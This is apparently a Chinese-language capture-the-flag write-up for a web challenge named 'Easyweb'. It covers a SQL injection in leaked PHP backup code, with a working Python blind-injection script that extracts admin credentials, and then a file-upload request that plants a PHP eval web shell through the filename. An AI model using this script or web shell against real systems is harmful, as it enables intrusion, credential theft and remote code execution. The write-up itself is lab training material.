[总决赛]Easyweb

备份文件泄露，image.php.bak：

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

明显的SQL注入，过滤是先将字符串中的'、"、\添加上反斜杠，再将所有的\0、%00、\、'四个符号替换为空。

这里就存在一个多层过滤反而造成漏洞的问题，传入\0后会添加\为\\0，经过替换为空剩下\，注释掉字符串拼接后的字符，语句变成了这样。

select * from images where id='\' or path='{$path}'

盲注：

import requests

if __name__ == "__main__":
    result = ""
    for i in range(1, 256):
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            # url = f"http://4cbf7e65-8140-46e5-9290-d5b20b810fc9.node4.buuoj.cn/image.php?id=\\0&path=or id=if(ascii(substr((select username from users),{i},1))>{mid},1,0)%23"
            url = f"http://4cbf7e65-8140-46e5-9290-d5b20b810fc9.node4.buuoj.cn/image.php?id=\\0&path=or id=if(ascii(substr((select password from users),{i},1))>{mid},1,0)%23"
            response = requests.get(url)
            if response.text.find("JFIF") != -1:
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        result += chr(mid)
        print(result, end="\n")

username: admin
password: 34b554ef83fbe7e7e859

进来之后是文件上传，这就比较简单了，由于过滤了php，我们用短标签文件名绕过即可。

------WebKitFormBoundary7kJGMqV6oJpewWgp
Content-Disposition: form-data; name="file"; filename="<?= @eval($_POST['shell']);?>"
Content-Type: application/octet-stream

111

------WebKitFormBoundary7kJGMqV6oJpewWgp
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundary7kJGMqV6oJpewWgp--